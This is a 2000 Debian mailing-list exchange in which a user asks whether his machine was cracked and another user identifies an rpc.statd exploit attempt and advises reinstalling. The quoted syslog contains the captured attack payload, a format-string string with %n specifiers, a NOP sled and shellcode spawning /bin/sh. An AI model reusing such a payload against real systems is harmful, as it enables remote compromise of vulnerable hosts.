At first glance, this appears to be an attempt to exploit rpc.statd. If they *DID* get in, you have no way of knowing what may or may not have been modified. I just dealt with a machine about two weeks ago that had a very extensive rootkit installed. The only way it was noticed that the machine had been compromised was that the admin noticed many processes named "tfn-daemon" installed, which, for the uninitiated, is the Tribal Flood Network DDoS tools.
Reinstall your system. It sucks, but it's a learning experience. -jg -- Jeremy L. Gaddis <[EMAIL PROTECTED]> -----Original Message----- From: Ron Hale-Evans [SMTP:[EMAIL PROTECTED] Sent: Sunday, October 01, 2000 1:53 PM To: debian-user@lists.debian.org Subject: Was my system cracked? (retry 2) [snip] Sep 30 19:10:53 ludism syslogd: Cannot glue message parts together Sep 30 19:10:53 ludism 173 Sep 30 19:10:53 /sbin/rpc.statd[205]: gethostbyname error for ^X-?ø^X-?ø^Y-?ø^Y-?ø^Z-?ø^Z-?ø^[-?ø^[-?ø%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%nêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêê1¿Î|YâA^PâA^H?¿âA^Dâ^?¿â^A?fÕÄ?^BâY^L?A^Nô?A^H^PâI^DÄA^D^Là^A?fÕÄ?^D?fÕÄ?^E0¿àA^D?fÕ Sep 30 19:10:53 ludism «^F/bin«F^D/shA0¿àF^Gâv^LçV^PçN^LâÛ?^KÕÄ?^AÕÄË??? Sep 30 19:14:01 ludism /USR/SBIN/CRON[32067]: (news) CMD (rnews -U) Sep 30 19:14:01 ludism innd: ME time 300548 idle 300544(2) artwrite 0(0) artlink 0(0) hiswrite 0(0) hissync 0(3) So, do you think my machine has been cracked? It looks as though they've been trying to cover their tracks, but not doing it very well. If it is a crack, what can I do about it apart from wiping the machine and rebuilding from the ground up? Thanks... Ron Hale-Evans -- Ron's Info Closet: Center for Ludic Synergy, Kennexions Glass Bead Game, Positive Revolution FAQ, Hexagram-8 I Ching Mailing List, and links... Ron Hale-Evans ... [EMAIL PROTECTED] ... <http://www.apocalypse.org/~rwhe/> Further up and further in! fnord -- Unsubscribe? mail -s unsubscribe [EMAIL PROTECTED] < /dev/null